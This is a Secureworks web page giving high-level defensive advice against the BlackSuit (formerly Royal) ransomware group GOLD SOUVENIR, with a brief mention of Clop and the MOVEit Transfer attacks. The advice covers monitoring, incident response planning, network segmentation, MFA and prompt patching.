How to detect and mitigate GOLD SOUVENIR attacks
Exploiting file transfer services gives threat groups like Clop operator GOLD TAHOE, the group behind the MOVEit Transfer attacks, access to shared files. Some of these may come from third parties, as for example in the Zellis payroll compromise which formed part of the MOVEit Transfer attacks.
HOW GOLD TAHOE (TA505, FIN11) CONDUCTS ITS ATTACKS
Download the Secureworks State of the Threat report for more insights on securing your most valuable business assets.
READ Report
GOLD SOUVENIR is a financially motivated cybercrime group that carries out ransomware and data extortion attacks. The group operated as Royal ransomware until mid-2023 and has now rebranded as BlackSuit or Black Suit.
How GOLD SOUVENIR (BlackSuit) Conducts its Attacks
The best protection against ransomware attacks comes from following the essentials of cyber defense
© 2024 SecureWorks, Inc. All rights reserved.
Implementing comprehensive extended monitoring and detection on endpoints, networks, and cloud resources can detect and stop attacks before they take hold.
Create an Incident Response Plan. Rehearse and test it on a regular basis. Ensure it is stored in a location that will be accessible after a ransomware attack.
Network Segmentation - Flat networks make it easy for threat actors like GOLD SOUVENIR to move laterally once they gain access. Network segmentation limits lateral movement.
Implement strong passwords and phishing resistant multi-factor authentication (MFA):
Organizations should monitor for unusual usage of legitimate and native tools to prevent threat actor usage of living-off-the-land techniques from going undetected.
Patch promptly to minimize exposure to ransomware and other attacks. Patching external facing devices and systems is especially important.
?
Public-facing applications and services that are not protected with MFA provide an open door to threat actors with stolen credentials. MFA can stop their progress, especially phishing-resistant implementations that protect against adversary-in-the-middle attacks. Implementation should be comprehensive, leaving no accounts unprotected.
